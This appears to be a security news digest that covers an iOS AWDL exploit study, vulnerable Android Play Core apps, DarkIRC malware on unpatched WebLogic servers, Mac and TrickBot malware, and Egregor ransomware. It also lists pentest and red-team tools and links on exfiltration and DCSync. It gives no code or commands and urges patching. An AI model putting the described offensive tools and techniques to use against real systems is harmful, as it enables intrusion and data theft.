The last couple of weeks are not so much cool news, but we have selected the most interesting and useful. In the contents you can find a short description for each section.
- Vulnerabilities: IOS research, android apps (check yours) and weblogic (again);
- Tools: Usefull tools. Depix and Karkinos should be tested;
- News: Only malware. IOS, Trickbot and happy ransom;
- Research: Books, articles, reports
Really short feedback -> here
Ian Beer from Google Project Zero has published the results of a study on the exploitation of a vulnerability in Apple iOS, which causes damage to the operating system kernel memory and allows full remote access to all user data.
Ian Beer drew attention to the memmove function: after checking its parameters, he found the most common buffer overflow error in the code. With the help of this bug, an attacker can perform a batch injection into an AWDL connection (while not necessarily being on the same wi-fi network), gain access to the device, and execute a rooted implant code. All actions were completed in a few minutes and was carried out with the iPhone 11 Pro in the next room. In his opinion, with sufficient will and funding, the trick can be done in seconds and at a much greater distance from the target.
Impressive research job!!!
Please click update on your iPhone.
About 8% of apps in the Google Play Store are vulnerable to a bug in the Play Core library. Check Point warned that the developers of many popular Android applications forgot to update an important library and are now vulnerable to attacks.
Earlier this year, researchers from Oversecured discovered the critical vulnerability CVE-2020-8913 in Play Core. This bug could be exploited by a malicious application installed on the user’s device and with its help injecting dangerous code into other applications, as well as stealing confidential data, including passwords, photos, 2FA codes and much more.
The list of apps that have already updated the library includes Facebook, Instagram, Snapchat, WhatsApp and Chrome. But, unfortunately, the developers of many other large applications did not do this. Among such applications, experts listed Microsoft Edge, Grindr, OKCupid, Cisco Teams, Viber and Booking. In total, problematic applications have been installed over 250,000,000 times.
Many Oracle WebLogic servers remain vulnerable to RCE CVE-2020-14882, which was patched two months ago. Juniper Threat Labs writes that the most interesting malware is DarkIRC, which is currently sold on hack forums for $ 75.
DarkIRC infiltrates unpatched servers using a PowerShell script executed via an HTTP GET request in the form of a malicious binary that has both analysis bypass and sandbox functionality. For example, before unpacking, the malware checks whether it is running on a VMware, VirtualBox, VBox, QEMU, or Xen virtual machine, and stops the infection process if it detects a sandboxed environment.
DarkIRC has many features, including keylogging, stealing files and executing commands on an infected server, stealing credentials, spreading to other devices via MSSQL and RDP (via brute force), SMB or USB
Update if you have not already done so.
It is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files) – goal is to provide solution to security researchers and network administrators with the task of network traffic analysis while they try to identify weaknesses.
It is a tool for recovering passwords from pixelized screenshots | Actually a red team tool, but it’s important that the blue side of this world is aware of this as well.
PYTMIPE is a Python 3 library for manipulating Windows tokens and managing impersonations in order to gain more privileges on Windows. TMIPE is the python 3 client which uses the _ pytmipe _ library.
Karkinos is a light-weight ‘Swiss Army Knife’ for penetration testing and/or hacking CTF’s (like CyberChef). Try it out!
New malware for Mac, with a backdoor for later remote access. looks like a Word document, although this application is in the archive, and so far few people have detected it as a virus. interesting exploration of its functionality.
The primary compromise is through a Zip archive disguised as a Word document called “ALL tim nha Chi Ngoc Canada”. To bypass detection by anti-virus solutions, several specialized symbols have been added to the archive name. After activating the primary malware, the payload is retrieved, which is already retrieved directly by the backdoor itself. It has some RAT functions – it collects information about the system, communicates with C&C and also work with the file system and load additional functional modules.
Over the past few weeks, TrickBot introduced new obfuscation features, a new C2 infrastructure, and launched new spam campaigns to recruit zombie computers. The botnet has a new feature for interacting with the UEFI BIOS. Such an upgrade will significantly complicate the task of not only treating, but also detecting infection.
So far, the new TrickBot module only checks the SPI controller in order to understand whether BIOS protection is enabled, but in fact does not make changes to the firmware yet.
Egregor liked to print the ransom demand on the hacked organization’s printers (why not?). Recently, a large Latin American retail chain Cencosud learned about the attack in this way. The other day, TransLink, a Vancouver public transport company.
The fact that something amiss had happened in TransLink became known on December 1: residents of the city of 700,000 could not use Compass cards to pay for travel on buses, ferries and trains.
The rest of the details of the attack, as usual, are unknown.
Tactics, Techniques and Procedures (TTPs) used by the Nefilim ransomware threat actor – a detailed walkthrough. All TTPs are mapped to MITRE ATT&CK Framework: https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks
Security & Hacking related books. One of the best collection of books on information security. They are so good that they can be found in almost every collection. https://docs.google.com/document/d/1-l1dagQ643nH8chDl2VwRwdJxZZ6D3M1K07pvLfAbSI
Not bad info about DCSync: https://www.blacklanternsecurity.com/2020-12-04-DCSync
Data Exfiltration with LOLBins: https://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-20e5e9c1ed8e
Visualizing IP Traffic with Brim, Zeek and NetworkX: https://medium.com/brim-securitys-knowledge-funnel/visualizing-ip-traffic-with-brim-zeek-and-networkx-3844a4c25a2f
Really short feedback -> here